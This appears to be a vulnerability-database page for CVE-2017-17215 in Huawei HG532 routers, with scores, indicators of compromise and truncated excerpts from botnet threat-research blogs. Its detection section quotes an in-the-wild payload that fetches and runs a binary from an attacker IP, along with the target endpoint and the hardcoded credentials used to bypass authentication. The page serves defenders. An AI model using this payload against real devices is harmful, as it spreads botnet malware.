CVE-2017-17215
published 2018-03-20CVE-2017-17215: Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to…
PriorityP186high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
78.61%
99.5th percentile
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huawei_technologies_co_ltd | hg532 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command$(/bin/busybox wget -g 178.62.227.13 -l /tmp/binary -r /wrgjwrgjwrg246356356356/hmips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary wget.selfrep.exploit.huawei)$(echo HUAWEIUPNP)↗
- →CVE-2017-17215 exploit targets the Huawei HG532 SOAP endpoint /ctrlt/DeviceUpgrade_1 on port 37215 via HTTP POST with a crafted Authorization Digest header (username="dslf-config", realm="HuaweiHomeGateway") and a command-injection payload in the body using the pattern $(...)$(echo HUAWEIUPNP). ↗
- →The string 'HUAWEIUPNP' (via echo HUAWEIUPNP) is a reliable network-level signature for CVE-2017-17215 exploit attempts; detect it in HTTP POST body traffic to port 37215. ↗
- →Trend Micro IDS/IPS rule 1134287 'WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)' covers this exploit; use as a reference signature pattern. ↗
- →Fortinet IPS signature 'Huawei.HG532.Remote.Code.Execution' covers CVE-2017-17215 exploitation attempts. ↗
- →Yowai (Mirai variant) listens on port 6 for C2 commands; monitor for unexpected inbound/outbound connections on TCP port 6 from IoT devices. ↗
- →Mirai variant (Campaign 1/Omni) uses XOR table key 0xBAADF00D and drops iptables rules to block further connections on certain ports after infection; look for iptables DROP rules added by a newly spawned process on IoT devices. ↗
- →Botnet exploiting CVE-2017-17215 uses custom UPX packing with unique signatures; scan for UPX-packed ELF binaries with non-standard UPX headers on IoT devices. ↗
- ·The CVE-2017-17215 exploit requires the attacker to be authenticated (per NVD), but in practice Mirai/Bushido variants supply a hardcoded Digest Authorization header (username='dslf-config', realm='HuaweiHomeGateway') in the exploit payload, effectively bypassing the authentication requirement on default-configured devices. ↗
- ·The Mirai variant payload server at 178.62.227.13 switched from an open directory listing to hiding file listings on February 22, 2019, while continuing to serve files; direct URL enumeration may no longer work but direct file fetches remain active. ↗
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h4hx-pmcg-3856: Huawei HG532 with some customized versions has a remote code execution vulnerability
ghsa_unreviewed·2022-05-14
CVE-2017-17215 [HIGH] CWE-20 GHSA-h4hx-pmcg-3856: Huawei HG532 with some customized versions has a remote code execution vulnerability
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
VulnCheck
huawei hg532_firmware Improper Input Validation
vulncheck·2017·CVSS 8.8
CVE-2017-17215 [HIGH] huawei hg532_firmware Improper Input Validation
huawei hg532_firmware Improper Input Validation
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.
Affected: huawei hg532_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://research.checkpoint.com/2017/good-zero-day-skiddie/; https://threatpost.com/huawei-router-vulnerability-used-to-spread-mirai-variant/129238/; https://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/; https://www.netscout.com/b
No detection rules found.
Hackernews
RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS
blogs_hackernews·2026-06-30·CVSS 8.8
CVE-2017-17215 [HIGH] RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## RustDuck Botnet Rebuilds in Rust to Hijack Routers and Servers for DDoS
A new two-stage malware family called RustDuck is hijacking home routers, IP cameras, Android boxes, and poorly secured servers, then stitching them into a network built to knock websites and online services offline.
Researchers at QiAnXin's XLab have tracked it since February 2026, and say the real story is not how big it is today, but how fast it is changing.
The end goal is a distributed denial-of-service (DDoS) attack: flooding a target with junk traffic from the infected machines until it buckles.
RustDuck is one more entrant in a crowded field, b
Hackernews
Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
blogs_hackernews·2026-04-18·CVSS 6.3
CVE-2024-3721 [MEDIUM] Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
Threat actors are exploiting security flaws in TBK DVR and end‑of‑life (EoL) TP-Link Wi-Fi routers to deploy Mirai -botnet variants on compromised devices, according to findings from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42.
The attack targeting TBK DVR devices has been found to exploit CVE-2024-3721 (CVSS score: 6.3), a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices, to deliver a Mirai variant called Nexcorium .
"IoT devices are increasingly prime targets for
Qualys
Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai | Qualys
blogs_qualys·2025-01-21
Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai | Qualys
#### Table of Contents
- Overview of the latest Murdoc Botnet campaign and a historical timeline
- Technical campaign analysis
- Command-and-control analysis
- Murdoc Botnet
- In-depth shell script analysis:
- Affected Countries
- Qualys EDR Coverage
- Conclusion & Recommended Steps to Protect Against the Variant
- IOCs
- IPs
- Contributors:
The Qualys Threat Research Unit has uncovered a large-scale, ongoing operation within the Mirai campaign, dubbed Murdoc Botnet. This variant exploits vulnerabilities targeting AVTECH Cameras and Huawei HG532 routers. It demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks. In this blog, we will explore Murdoc Botnet’s propagation methods and attack vectors.
## Overview of the la
Qualys
Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai
blogs_qualys·2025-01-21
Mass Campaign of Murdoc Botnet Mirai: A New Variant of Corona Mirai
## Table of Contents
Overview of the latest Murdoc Botnet campaign and a historical timeline
Technical campaign analysis
Command-and-control analysis
Murdoc Botnet
In-depth shell script analysis:
Affected Countries
Qualys EDR Coverage
Conclusion & Recommended Steps to Protect Against the Variant
IOCs
IPs
Contributors:
The Qualys Threat Research Unit has uncovered a large-scale, ongoing operation within the Mirai campaign, dubbed Murdoc Botnet. This variant exploits vulnerabilities targeting AVTECH Cameras and Huawei HG532 routers. It demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks. In this blog, we will explore Murdoc Botnet’s propagation methods and attack vectors.
## Overview of the latest Murdoc Bo
Bleepingcomputer
New Mirai botnet targets industrial routers with zero-day exploits
blogs_bleepingcomputer·2025-01-07·CVSS 8.8
CVE-2024-12856 [HIGH] New Mirai botnet targets industrial routers with zero-day exploits
## New Mirai botnet targets industrial routers with zero-day exploits
## Bill Toulas
A relatively new Mirai-based botnet has been growing in sophistication and is now leveraging zero-day exploits for security flaws in industrial routers and smart home devices.
Exploitation of previously unknown vulnerabilities started in November 2024, according to Chainxin X Lab researchers who monitored the botnet's development and attacks.
One of the security issues is CVE-2024-12856, a vulnerability in Four-Faith industrial routers that VulnCheck discovered in late December but noticed efforts to exploit it around December 20.
to leverage zero-day exploits has been leveraging a zero-day exploit for CVE-2024-12856, impacting Four-Faith routers, alongside other custom exploits for flaws in Neterbit
Fortinet
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
blogs_fortinet·2024-09-05·CVSS 9.8
CVE-2024-36401 [CRITICAL] Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401
Overview
GOREVERSE
SideWalk
Mirai Variant - JenX
Condi
CoinMiner
[1]
[2]
[3]
[4]
Conclusion
Fortinet Protection
IoC
URL
IP Address/Hostname
Wallet
SHA256Hash
By Cara Lin and Vincent Li | September 05, 2024
Affected Platforms: GeoServer prior to versions 2.23.6, 2.24.4, and 2.25.2
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
GeoServer is an open-source software server written in Java that allows users to share and edit geospatial data. It is the reference implementation of the Open Geospatial Consortium (OGC) Web Feature Service (WFS) and Web Coverage Service (WCS) standards. On July 1, the project maintainers released
Bleepingcomputer
Malware exploits 5-year-old zero-day to infect end-of-life IP cameras
blogs_bleepingcomputer·2024-08-29·CVSS 8.7
CVE-2024-7029 [HIGH] Malware exploits 5-year-old zero-day to infect end-of-life IP cameras
## Malware exploits 5-year-old zero-day to infect end-of-life IP cameras
## Bill Toulas
The Corona Mirai-based malware botnet is spreading through a 5-year-old remote code execution (RCE) zero-day in AVTECH IP cameras, which have been discontinued for years and will not receive a patch.
The flaw, discovered by Akamai's Aline Eliovich, is tracked as CVE-2024-7029 and is a high-severity (CVSS v4 score: 8.7) issue in the "brightness" function of the cameras, allowing unauthenticated attackers to inject commands over the network using specially crafted requests.
Specifically, the easy-to-exploit flaw lies in the "brightness" argument in the "action=" parameter of the AVTECH cameras' firmware, intended to allow remote adjustments to the brightness of a camera.
The flaw impacts all AVTECH A
Fortinet
The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
blogs_fortinet·2024-06-25·CVSS 9.8
[CRITICAL] The Growing Threat of Malware Concealed Behind Cloud Services | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
The Growing Threat of Malware Concealed Behind Cloud Services
UNSTABLE Botnet
Condi DDoS Botnet
UDP Flooder and Process Checker
Skibidi
Conclusion
Fortinet Protections
IOCs
C2
URLs
Files
By Cara Lin and Vincent Li | June 25, 2024
Affected Platforms: Linux Distributions
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
Cybersecurity threats are increasingly leveraging cloud services to store, distribute, and establish command and control (C2) servers, such as VCRUMS stored on AWS or SYK Crypter distributed via DriveHQ. This shift in strategy presents significant challenges for detection and prevention, as cloud services provide scalability, anonymity, and resilience that traditional hostin
Fortinet
2022 IoT Threat Review | FortiGuard Labs
blogs_fortinet·2023-01-13·CVSS 8.8
[HIGH] 2022 IoT Threat Review | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
2022 IoT Threat Review
By Eduardo Altares, Joie Salvio and Roy Tay | January 13, 2023
FortiGuard Labs monitors the IoT botnet threat landscape for new and emerging campaigns. We do this with the assistance of our honeypots we have deployed to capture active attacks in the wild. This article provides insights into the data collected from our monitoring system over the past year.
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Attack Origins
Our distributed honeypot systems allow us to capture and monitor campaigns that are actively targeting IoT devices for infection. In most cases, these devices are turned into bots used to perform Distributed Denial o
Unit42
Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
blogs_unit42·2022-05-20·CVSS 9.8
CVE-2022-22954 [CRITICAL] Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
Ruchna Nigam
Published: May 20, 2022
High Profile Threats
Vulnerabilities
CVE-2022-22954
CVE-2022-22960
CVE-2022-22972
CVE-2022-22973
VMware
## Executive Summary
On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.
Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of A
Unit42
Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
blogs_unit42·2022-05-20·CVSS 9.8
CVE-2022-22954 [CRITICAL] Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)
## Executive Summary
On April 6, 2022, VMware published a security advisory mentioning eight vulnerabilities, including CVE-2022-22954 and CVE-2022-22960 impacting their products VMware Workspace ONE Access, Identity Manager and vRealize Automation. On April 13, they updated their advisory with information that CVE-2022-22954 is being exploited in the wild.
Multiple writeups detailing exploitation scenarios for the aforementioned two vulnerabilities were published in the last week of April, finally followed by a CISA Alert on May 18. The CISA Alert also calls out CVE-2022-22972 and CVE-2022-22973 – published on the same day and affecting the same products – as being highly likely to be exploited.
Unit 42 has observed numerous instances of CVE-2022-22954 being exploited in the wild. In t
Fortinet
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
blogs_fortinet·2022-04-01·CVSS 9.8
[CRITICAL] Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
FORTIGUARD LABS THREAT RESEARCH
Fresh TOTOLINK Vulnerabilities Picked Up by Beastmode Mirai Campaign
By Joie Salvio and Roy Tay | April 01, 2022
Between February and March 2022, our FortiGuard Labs team observed that the Beastmode (aka B3astmode) Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Five new exploits were added within a month, with three targeting various models of TOTOLINK routers.
This inclusion of TOTOLINK exploits is especially noteworthy as they were added just a week after the exploit codes were published on GitHub. We previously reported on the MANGA campaign, which similarly adopted exploit code within weeks of their release.
By rapidly adopting newly released exploit code, threat actors can potentially infect vulnerable devices and expan
Fortinet
Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
blogs_fortinet·2021-12-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] Critical Apache Log4j Vulnerability Updates | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Critical Apache Log4j Vulnerability Updates
By Shunichi Imano, James Slaughter, and Geri Revay | December 21, 2021
Beginning December 9th, most of the internet-connected world was forced to reckon with a critical new vulnerability discovered in the Apache Log4j framework deployed in countless servers. Officially labeled CVE-2021-44228, but colloquially known as “Log4Shell”, this vulnerability is both trivial to exploit and allows for full remote code execution on a target system. This has earned the vulnerability a CVSS score of 10 – the maximum.
On December 14th, the Apache Software Foundation revealed a second Log4j vulnerability (CVE-2021-45046). It was initially identified as a Denial-of-Service (DoS) vulnerability with a CVSS score of 3.7 and modera
Trendmicro
IoT Monitoring-Daten zu Threat Defense umwandeln
blogs_trendmicro·2020-10-14
IoT Monitoring-Daten zu Threat Defense umwandeln
Cyberbedrohungen
## IoT Monitoring-Daten zu Threat Defense umwandeln
Um seine Kunden noch besser vor Cyberbedrohungen zu schützen, verwendet Trend Micro die gesammelten Indicators of Compromise aus IoTAngriffen, um die Fähigkeit zur Erkennung von Bedrohungen zu verbessern.
By: Shimamura Makoto Oct 14, 2020 Read time: ( words)
Save to Folio
Originalartikel von Shimamura Makoto, Senior Security Specialist
Der Sicherheitsbericht zur Jahresmitte 2020 von Trend Micro weist im Vergleich zum zur zweiten Jahreshälfte 2019 eine Steigerung von 70 Prozent bei Angriffen auf Geräte und Router aus. Dazu gehören auch Attacken auf Internet-of-Things (IoT)-Systeme, die in ihrer Häufung beunruhigen. Die Sicherheitsforscher von Trend Micro überwachen die Trends bezüglich dieser Angriffe und untersuchte
Trendmicro
Transforming IoT Monitoring Data into Threat Defense
blogs_trendmicro·2020-10-08
Transforming IoT Monitoring Data into Threat Defense
IoT
# Transforming IoT Monitoring Data into Threat Defense
In this article, we feature data gathered from our continuous monitoring of C&C servers of botnets such as Mirai and Bashlite. We also share how this data is used to bolster the protection of IoT devices.
By: Shimamura Makoto
2020/10/08
Read time: ( words)
Save to Folio
In our midyear roundup report, we shared that in the first half of 2020, there was a 70% increase in inbound attacks on devices and routers compared with the second half of 2019. This data includes attacks on Internet of Things (IoT) systems, which remain alarming and prevalent.
With the aim of protecting customers effectively by continuously monitoring trends in IoT attacks, we examined Mirai and Bashlite (aka Qbot), two notorious IoT botnet malware types th
Tenable
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
blogs_tenable·2020-04-30
How VPR Helped Prioritize the Most Dangerous CVEs in 2019
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Mirai-Varianten zielen auf Videoüberwachungssysteme
blogs_trendmicro·2020-02-06·CVSS 9.8
[CRITICAL] Mirai-Varianten zielen auf Videoüberwachungssysteme
Ausnutzung von Schwachstellen
## Mirai-Varianten zielen auf Videoüberwachungssysteme
Sicherheitsforscher von Trend Micro haben zwei Varianten der Internet of Things (IoT)-Malware, Mirai, gefunden. Diese nutzen neue Verbreitungsmethoden und verschaffen sich Zugang über eine Schwachstelle in Videoüberwachungs-Speichersystemen.
By: Trend Micro Feb 06, 2020 Read time: ( words)
Save to Folio
Von Trend Micro
Sicherheitsforscher von Trend Micro haben zwei Varianten der Internet of Things (IoT) -Malware, Mirai, gefunden. Die beiden Varianten, SORA (IoT.Linux.MIRAI.DLEU) und UNSTABLE (IoT.Linux.MIRAI.DLEV) nutzen neue Verbreitungsmethoden und verschaffen sich Zugang über die Schwachstelle CVE-2020-6756 in Rasilient PixelStor5000 -Videoüberwachungs-Speichersystemen.
Mirai ist eine Malware, di
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42·2019-10-31·CVSS 9.8
[CRITICAL] Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Threat Research Center
Threat Research
Cybercrime
## Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
Asher Davila
Published: October 31, 2019
Cybercrime
Threat Research
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
WiFi routers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - mos
Unit42
Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
blogs_unit42·2019-10-31·CVSS 9.8
[CRITICAL] Home & Small Office Wireless Routers Exploited to Attack Gaming Servers
## Executive Summary
In September 2019, during the proactive IoT threat-hunting process conducted daily by the Unit 42 (formerly Zingbox security research) team, we discovered an updated Gafgyt variant attempting to infect IoT devices; specifically small office/home wireless routers of known commercial brands like Zyxel, Huawei, and Realtek. This Gafgyt variant is a competing botnet to the JenX botnet, which also uses remote code execution exploits to gain access and recruit routers into botnets to attack gaming servers - most notably those running the Valve Source engine - and cause a Denial of Service (DoS). This variant also competes against similar botnets, which we have found are frequently sold on Instagram. According to Shodan scans, there are more than 32,000 WiFi routers potentia
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
Aug 13, 2019
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlis
Trendmicro
Neko, Mirai and Bashlite Target Routers, Devices
blogs_trendmicro·2019-08-13
Neko, Mirai and Bashlite Target Routers, Devices
# Neko, Mirai and Bashlite Target Routers, Devices
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.
By: Augusto Remillano II, Jakub Urbanec
2019/08/13
Read time: ( words)
Save to Folio
Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week. A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
May 23, 2019
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campa
Trendmicro
New Mirai Variant Uses Multiple Exploits
blogs_trendmicro·2019-05-23
New Mirai Variant Uses Multiple Exploits
Exploits & Vulnerabilities
# New Mirai Variant Uses Multiple Exploits
We discovered a new variant of Mirai that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities.
By: Augusto Remillano II, Jakub Urbanec
2019/05/23
Read time: ( words)
Save to Folio
We discovered a new variant of Mirai (detected as Backdoor.Linux.MIRAI.VWIPT) that uses a total of 13 different exploits, almost all of which have been used in previous Mirai-related attacks. Typical of Mirai variants, it has backdoor and distributed denial-of-service (DDoS) capabilities. However, this case stands out as the first to have used all 13 exploits together in a single campaig
Unit42
Mirai Compiled for New Processors Surfaces in the Wild
blogs_unit42·2019-04-08
Mirai Compiled for New Processors Surfaces in the Wild
Threat Research Center
Threat Research
Malware
## Mirai Compiled for New Processors Surfaces in the Wild
Ruchna Nigam
Published: April 8, 2019
Malware
Threat Research
Botnet
DDoS
IoT
Linux
Mirai
## Executive Summary
In late February 2019, Unit 42 discovered Mirai samples compiled for new processors/architectures not previously seen before. Despite the source code being publicly released In October of 2016, the malware has, until now, only been found targeting a fixed set of processors/architectures.
Unit 42 has found the newly discovered samples are compiled for Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. This is not the first time Mirai has been expanded for new processor architectures, samples targeting ARC CPUs were discovered in Janu
Unit42
Mirai Compiled for New Processors Surfaces in the Wild
blogs_unit42·2019-04-08
Mirai Compiled for New Processors Surfaces in the Wild
# Executive Summary
In late February 2019, Unit 42 discovered Mirai samples compiled for new processors/architectures not previously seen before. Despite the source code being publicly released In October of 2016, the malware has, until now, only been found targeting a fixed set of processors/architectures.
Unit 42 has found the newly discovered samples are compiled for Altera Nios II, OpenRISC, Tensilica Xtensa, and Xilinx MicroBlaze processors. This is not the first time Mirai has been expanded for new processor architectures, samples targeting ARC CPUs were discovered in January 2018. Yet this development shows that Mirai developers continue to actively innovate, targeting a growing array of IoT devices. The malware gained notoriety in 2016 for its use in massive denial of service att
Trendmicro
UPnP-enabled Home Devices and Vulnerabilities
blogs_trendmicro·2019-03-06
UPnP-enabled Home Devices and Vulnerabilities
# UPnP-enabled Home Devices and Vulnerabilities
UPnP convenience comes security holes that range from attackers gaining control of devices to bypassing firewall protections. We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices."
By: Tony Yang
Mar 06, 2019
Read time: ( words)
Save to Folio
Earlier this year, users of Chromecast streaming dongles, Google Home devices, and smart TVs were inundated with a message promoting YouTuber PewDiePie’s channel. The hijacking is said to be part of an ongoing subscriber count battle on the video sharing site. The hackers behind it reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled, which caused the routers to forward publ
Trendmicro
UPnP-enabled Home Devices and Vulnerabilities
blogs_trendmicro·2019-03-06
UPnP-enabled Home Devices and Vulnerabilities
# UPnP-enabled Home Devices and Vulnerabilities
UPnP convenience comes security holes that range from attackers gaining control of devices to bypassing firewall protections. We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices."
By: Tony Yang
2019/03/06
Read time: ( words)
Save to Folio
Earlier this year, users of Chromecast streaming dongles, Google Home devices, and smart TVs were inundated with a message promoting YouTuber PewDiePie’s channel. The hijacking is said to be part of an ongoing subscriber count battle on the video sharing site. The hackers behind it reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled, which caused the routers to forward public
Trendmicro
UPnP-enabled Home Devices and Vulnerabilities
blogs_trendmicro·2019-03-06
UPnP-enabled Home Devices and Vulnerabilities
## UPnP-enabled Home Devices and Vulnerabilities
UPnP convenience comes security holes that range from attackers gaining control of devices to bypassing firewall protections. We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices."
By: Tony Yang 2019/03/06 Read time: ( words)
Save to Folio
Earlier this year, users of Chromecast streaming dongles, Google Home devices, and smart TVs were inundated with a message promoting YouTuber PewDiePie’s channel. The hijacking is said to be part of an ongoing subscriber count battle on the video sharing site. The hackers behind it reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled, which caused the routers to forward public
Trendmicro
UPnP-enabled Home Devices and Vulnerabilities
blogs_trendmicro·2019-03-06
UPnP-enabled Home Devices and Vulnerabilities
## UPnP-enabled Home Devices and Vulnerabilities
UPnP convenience comes security holes that range from attackers gaining control of devices to bypassing firewall protections. We looked into UPnP-related events in home networks and found that many users still have UPnP enabled in their devices."
By: Tony Yang Mar 06, 2019 Read time: ( words)
Save to Folio
Earlier this year, users of Chromecast streaming dongles, Google Home devices, and smart TVs were inundated with a message promoting YouTuber PewDiePie’s channel. The hijacking is said to be part of an ongoing subscriber count battle on the video sharing site. The hackers behind it reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled, which caused the routers to forward publ
Trendmicro
Botnets nutzen ThinkPHP-Schwachstelle zur Verbreitung
blogs_trendmicro·2019-01-30·CVSS 9.8
[CRITICAL] Botnets nutzen ThinkPHP-Schwachstelle zur Verbreitung
Ausnutzung von Schwachstellen
## Botnets nutzen ThinkPHP-Schwachstelle zur Verbreitung
Cyberkriminelle können Hakai und Yowai einfach dazu missbrauchen, Webserver zu kapern und Websites anzugreifen.
By: Augusto Remillano II Jan 30, 2019 Read time: ( words)
Save to Folio
Originalbeitrag von Augusto Remillano II
Eine neue Mirai -Variante Yowai und die Gafgyt -Variante Hakai nutzen eine Schwachstelle (im Dezember 2018 gepatcht) im quelloffenen PHP Framework ThinkPHP aus, um ein Botnet via Websites zu verbreiten, die mit dem Framework erstellt wurden. Die Cyberkriminellen nutzen das Framework, um Dictionary-Angriffe auf Standard-Credentials zu starten und dann auf Webserver zuzugreifen. Das Ziel sind Distributed Denial of Service ( DDoS )-Angriffe. Die Telemetriedaten zeigten, dass diese
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
## ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II 2019/01/25 Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks ( DDoS ). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
blogs_trendmicro·2019-01-25
ThinkPHP Vulnerability Abused by Botnets
IoT
# ThinkPHP Vulnerability Abused by Botnets
We found a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai abusing a ThinkPHP flaw for propagation and DDoS attacks.
By: Augusto Remillano II
Jan 25, 2019
Read time: ( words)
Save to Folio
Cybercriminals are exploiting a ThinkPHP vulnerability — one that was disclosed and patched in December 2018 — for botnet propagation by a new Mirai variant we’ve called Yowai and Gafgyt variant Hakai. Cybercriminals use websites created using the PHP framework to breach web servers via dictionary attacks on default credentials and gain control of these routers for distributed denial of service attacks (DDoS). Our telemetry showed that these two particular malware types caused a sudden increase in attacks and infection attempts from Janua
Trendmicro
ThinkPHP Vulnerability Abused by Botnets
